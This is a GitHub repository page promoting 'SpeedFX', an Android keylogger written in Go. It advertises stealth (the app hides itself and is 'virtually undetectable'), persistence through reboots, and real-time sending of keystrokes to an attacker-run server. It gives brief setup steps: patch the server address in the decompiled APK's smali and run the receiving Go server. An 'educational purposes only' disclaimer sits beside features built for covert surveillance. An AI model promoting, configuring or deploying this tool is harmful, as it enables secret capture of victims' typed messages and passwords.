Skip to content

This is the simplest android Keylogger for education and research only. Updates and support are there

Notifications You must be signed in to change notification settings

ToolsForge/AndroidKeylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

Android Keylogger 2024

Key Features of SpeedFX: Visit for support

Your GIF

  1. Real-Time Key Logs: SpeedFX android keylogger sends key logs in real-time, allowing you to monitor activity seamlessly.

  2. Stealth Mode: Once installed, the SpeedFX APK hides itself, making it virtually Undetectable.

  3. Auto Restart: SpeedFX automatically restarts if it is closed or the device reboots.

  4. Never Dies: Engineered for persistence, SpeedFX run anyway.

  5. Suported OS- Linux, Windows, Termux

Keylogger for Android using Go

Overview

This repository contains a simple keylogger for Android devices developed in Go. It captures keyboard input and sends it to a server for analysis. Below are instructions for installing Go on both Windows and Termux, as well as running the Go server.

Setup APK

Decompile apk Look for smali 0.0.0.0:8080

Install Go on Windows

  1. Open your web browser and search for "install Go language on Windows".
  2. Follow the official installation instructions provided on the Go website.
  3. Open the command prompt (cmd).
  4. Navigate to the directory where the server code is located.
  5. Run the server using the command:
    go run server.go
    

Install Go on Termux (Android)

  1. Open Termux on your Android device.
  2. Install Go by running the following command:
    pkg install golang
    

Run the Go Server

  1. After installing Go, navigate to the directory where the server code is located.
  2. Run the server using the command:
    go run server.go
    
  3. Now the server is running and ready to receive data from the Android keylogger.

Note

This keylogger is intended for educational purposes only. Please use it responsibly and only on devices that you own or have explicit permission to monitor.

Educational Disclaimer:

SpeedFX is intended for educational purposes only. It is designed to help students understand the mechanics of keyloggers and the importance of cybersecurity. Unauthorized use of keyloggers can violate privacy laws and ethical standards.

About

This is the simplest android Keylogger for education and research only. Updates and support are there

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published